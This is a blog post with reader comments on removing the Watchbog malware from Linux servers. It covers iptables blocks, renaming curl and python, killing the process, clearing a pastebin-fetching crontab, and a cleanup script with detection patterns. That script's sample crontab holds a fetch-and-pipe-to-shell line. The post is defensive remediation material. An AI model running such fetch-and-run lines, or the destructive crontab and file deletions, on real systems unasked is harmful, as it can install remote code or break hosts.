Saturday, 10 November 2018

Blocking Watchbog Malware/Ransomware with IPTables on Linux

Block the IP address with the following iptables rules. Inbound packets from the address are matched on their source (-s) in the INPUT chain; outbound packets to it are matched on their destination (-d) in the OUTPUT chain (a -s match in OUTPUT would never fire, because the source of outgoing packets is this host):

iptables -A INPUT -s 104.20.208.21 -j DROP

iptables -A OUTPUT -d 104.20.208.21 -j DROP

This blocks one address only. As the comments below report, the address the malware contacts changes, so treat the rule as a stopgap, not a fix.

Now save the newly added iptables rules so they survive a reboot. On RHEL/CentOS 6 with the iptables service:

/sbin/service iptables save

(On Debian/Ubuntu there is no iptables service; save the rules with the iptables-persistent package or iptables-save instead.)

Additionally, if no application on the server depends on them, you can uninstall the tools the malware uses to fetch its scripts:

wget
curl
python

If you do have dependencies, rename the binaries instead, e.g.

# mv /usr/bin/curl /usr/bin/lruc

and do the same for 'wget' and 'python'.

Be aware that yum is written in Python, so it will not work while python is renamed or removed; put the binary back before the next package update. Removing or renaming these tools only hampers the downloader and breaks legitimate tooling; it is not a substitute for removing the malware and its persistence, which follows.

This is malware/ransomware. You must remove it completely from your system: the running process, its cron persistence and its files.


It runs under any user, including root. Find the process called "watchbog", and the user it runs as, with "top" or in the output of this command:

ps aux | grep '[w]atchbog'

(the bracket keeps grep from matching its own command line). Note the username in the first column; you need it for the cron cleanup below. Then kill the process with -9:

ps -ef | grep '[w]atchbog'

kill -9 <PID>


Then look at the cron jobs of this user (and of every other user that has a crontab, since the malware can run under any account):

crontab -u username -l

If it contains an every-minute entry that fetches a script from pastebin, such as

* * * * https://pastebin.com/

delete the whole crontab with

crontab -r -u username

If the process reappears after you kill it, this entry is what restarts it.

Then delete the binary:

/usr/bin/watchbog

and the directories it leaves in /tmp:

/tmp/*timesyncc.service*
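The steps above collected into one script. This is an added example, not code from the original post. The detection helpers read their input from stdin, so they can be run and checked as an unprivileged user against the constructed sample `ps` and crontab output embedded in the script; only the "apply" mode, which must run as root, touches the live system. The IP address, binary path and /tmp pattern are the ones from the post; gitee.com comes from the comments below; the pastebin path in the sample crontab is a placeholder, not a real paste.

```shell
#!/bin/sh
# Added example, not code from the original post: the watchbog cleanup
# steps as one script. Detection helpers read stdin so they can be tested
# without root; only "apply" mode (root) changes the system.

# Constructed sample, standing in for the output of `ps -eo pid,user,comm`.
SAMPLE_PS='  PID USER     COMMAND
    1 root     systemd
 4242 www-data watchbog
 4250 www-data grep
 4301 root     sshd'

# Constructed sample, standing in for `crontab -u www-data -l`.
# The pastebin path is a placeholder, not a real paste.
SAMPLE_CRON='# m h dom mon dow command
* * * * * curl -fsSL https://pastebin.com/raw/PLACEHOLDER | sh
0 3 * * * /usr/local/bin/backup.sh'

# Address from the post. Assumption: it is the one seen in your own logs;
# the comments report that it changes, so blocking it is a stopgap only.
BLOCK_IP=104.20.208.21

block_rules() {
    # Print the iptables commands that cut the host off from $1. Inbound
    # packets are matched on their source (-s), outbound packets on their
    # destination (-d); a -s match in the OUTPUT chain would never fire.
    printf 'iptables -A INPUT -s %s -j DROP\n' "$1"
    printf 'iptables -A OUTPUT -d %s -j DROP\n' "$1"
}

watchbog_pids() {
    # Read `ps -eo pid,user,comm` output on stdin and print the PIDs whose
    # command name is exactly "watchbog". Matching the comm column (not the
    # whole line) avoids catching the grep process itself.
    awk 'NR > 1 && $3 == "watchbog" { print $1 }'
}

watchbog_users() {
    # Same input; print the distinct users the process runs as.
    awk 'NR > 1 && $3 == "watchbog" { print $2 }' | sort -u
}

suspicious_cron_lines() {
    # Read a crontab on stdin and print the entries that pull code from the
    # paste / code-hosting sites named in the post and its comments.
    # Exit status is 0 if at least one such entry exists.
    grep -E 'pastebin\.com|gitee\.com'
}

case "${1:-}" in
apply)
    # Live cleanup. Order matters: cut the network first, then remove the
    # persistence, then kill the process, so cron cannot respawn it.
    [ "$(id -u)" -eq 0 ] || { echo "apply must run as root" >&2; exit 1; }
    block_rules "$BLOCK_IP" | sh
    for u in $(cut -d: -f1 /etc/passwd); do
        if crontab -u "$u" -l 2>/dev/null | suspicious_cron_lines >/dev/null; then
            echo "removing crontab of $u (pulls scripts from pastebin/gitee)"
            crontab -r -u "$u"
        fi
    done
    for pid in $(ps -eo pid,user,comm | watchbog_pids); do
        echo "killing watchbog pid $pid"
        kill -9 "$pid"
    done
    rm -f /usr/bin/watchbog
    rm -rf /tmp/*timesyncc.service*
    ;;
esac
```

Run it without arguments to load the helpers for inspection (for example `ps -eo pid,user,comm | watchbog_pids` after sourcing it), and as `./cleanup.sh apply` as root to perform the cleanup. Every user's crontab is checked, not only the one the process was found under, because the post notes the process can run under any account.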


10 comments:

  1. Greetings
    I have a recurring instance of this "watchbog" infection.
    I have taken steps to cripple it. However, I should like to ask you if you have any idea how it invades a server?

  2. I want to find out too, how I got infected!?

    My temporary fix is to run a loop inside a screen session to kill watchbog as it reappears.
    1) enter a new screen session by typing: screen
    2) grant sudo permissions by typing: sudo su
    3) write this one-liner: while true ; do killall watchbog ; done
    4) then press the CTRL+A+D key combo, and the screen session will continue running in the background, so the process gets killed instantly if it reappears.

  3. Hi Sudhakar,

    I followed all the steps except uninstalling curl and python. With no luck, the Watchbog process keeps reappearing.
    Looking at the temporary solution provided in one of the comments, I am killing watchbog inside a while loop, but in a single screen session.

    $ while true ; do killall watchbog ; done

    And I am keeping the session open in PuTTY.
    Please update if you find any permanent fix.

    Thank you for the post.

  4. Also, blocking the IP address using iptables is not helping, as the IP changes every time I kill the process.

  5. OK, so we installed a fresh UBUNTU 18.04.1, with fresh webserver packages. Copied WWW and SQL data and IT'S BACK!!!, so probably this WATCHBOG virus infects the system through the web services, but that really sounds impossible.
    On the new server, port 22 is open only from certain IPs.
    Passwords are different than on the previous server. The only thing which got transferred is WWW-DATA and SQL.

    Replies
    1. It was probably in your www-data folder.

  6. I followed the above steps. But instead of iptables I used our cloud provider's external firewall to block internet access.
    After that I proceeded as you mentioned but the virus kept coming back.
    I then realized it downloaded scripts from pastebin.
    I pointed pastebin.com and gitee.com to localhost in /etc/hosts. After that it stopped.

    Replies
    1. "I pointed pastebin.com and gitee.com to localhost in /etc/hosts." This is the best idea !

      It gives me some time before re-installing !
      Thanks a lot !
